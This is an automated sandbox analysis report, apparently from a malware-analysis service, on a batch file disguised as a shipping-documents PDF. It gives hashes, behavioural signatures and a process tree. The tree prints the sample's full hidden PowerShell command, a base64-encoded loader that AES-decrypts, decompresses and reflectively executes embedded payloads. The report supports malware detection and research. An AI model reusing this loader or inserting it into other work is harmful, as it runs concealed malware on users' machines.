Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03/03/2025, 07:14
Static task
static1
Behavioral task
behavioral1
Sample
Shipping_Documents.pdf_.bat
Resource
win7-20240903-en
5 signatures
150 seconds
General
-
Target
Shipping_Documents.pdf_.bat
-
Size
64KB
-
MD5
eac68a6120674bd90a20752d09d126e8
-
SHA1
9f73c48c6a5d177b67ca3f984caca601d6540427
-
SHA256
fbb07a7f02f9957564b487f7a893751f3059ae53dbcd0bdf5f176ca7be69096b
-
SHA512
f3240d2ecf309a5b1db1566b9fbff5ee7c946a26ff441327cbebb0ce1f3089e0a02934c14f164d59e934c585132413af38e4b6b389577eb61e1e7f590cb23248
-
SSDEEP
1536:vOYBZkbmEKUgXEXzICKUnF85J6ygoASfj3Hlbjeq5d6d01jK:vZQHfe5J6JQbn5dl1jK
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2812 powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2676 cmd.exe 2776 cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2812 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2676 wrote to memory of 2776 2676 cmd.exe 32 PID 2676 wrote to memory of 2776 2676 cmd.exe 32 PID 2676 wrote to memory of 2776 2676 cmd.exe 32 PID 2776 wrote to memory of 2812 2776 cmd.exe 34 PID 2776 wrote to memory of 2812 2776 cmd.exe 34 PID 2776 wrote to memory of 2812 2776 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Shipping_Documents.pdf_.bat"1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Shipping_Documents.pdf_.bat"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskaWlwYnogPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGlpcGJ6KSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRpaXBieiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRpaXBieiwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkaWlwYnoiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gamVsbHcoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0p1SS9EbVJrME9lUGxDcGlRWlZ2eHJCUGRLbEhpWnM2RkhUekRnNHpXNG89Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3crTmVxU0RTaWFmMzF3NWZaRzVuQUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gYmFhY2soJHBhcmFtX3Zhcil7CSRubmh0aj1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkYXdvcW49TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkbW9wcWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkbm5odGosIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG1vcHFlLkNvcHlUbygkYXdvcW4pOwkkbW9wcWUuRGlzcG9zZSgpOwkkbm5odGouRGlzcG9zZSgpOwkkYXdvcW4uRGlzcG9zZSgpOwkkYXdvcW4uVG9BcnJheSgpO31mdW5jdGlvbiBkaXpzZigkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHNpamVvPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJHB2aW53PSRzaWplby5FbnRyeVBvaW50OwkkcHZpbncuSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGlpcGJ6OyRhdGlwbD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGlpcGJ6KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkemtzIGluICRhdGlwbCkgewlpZiAoJHprcy5TdGFydHNXaXRoKCc6OiAnKSkJewkJJGVidXp1PSR6a3MuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JHFzbWF2PVtzdHJpbmdbXV0kZWJ1enUuU3BsaXQoJ1wnKTska2xjcGs9YmFhY2sgKGplbGx3IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHFzbWF2WzBdKSkpOyRxZ21xZj1iYWFjayAoamVsbHcgKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcXNtYXZbMV0pKSk7ZGl6c2YgJGtsY3BrICRudWxsO2RpenNmICRxZ21xZiAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-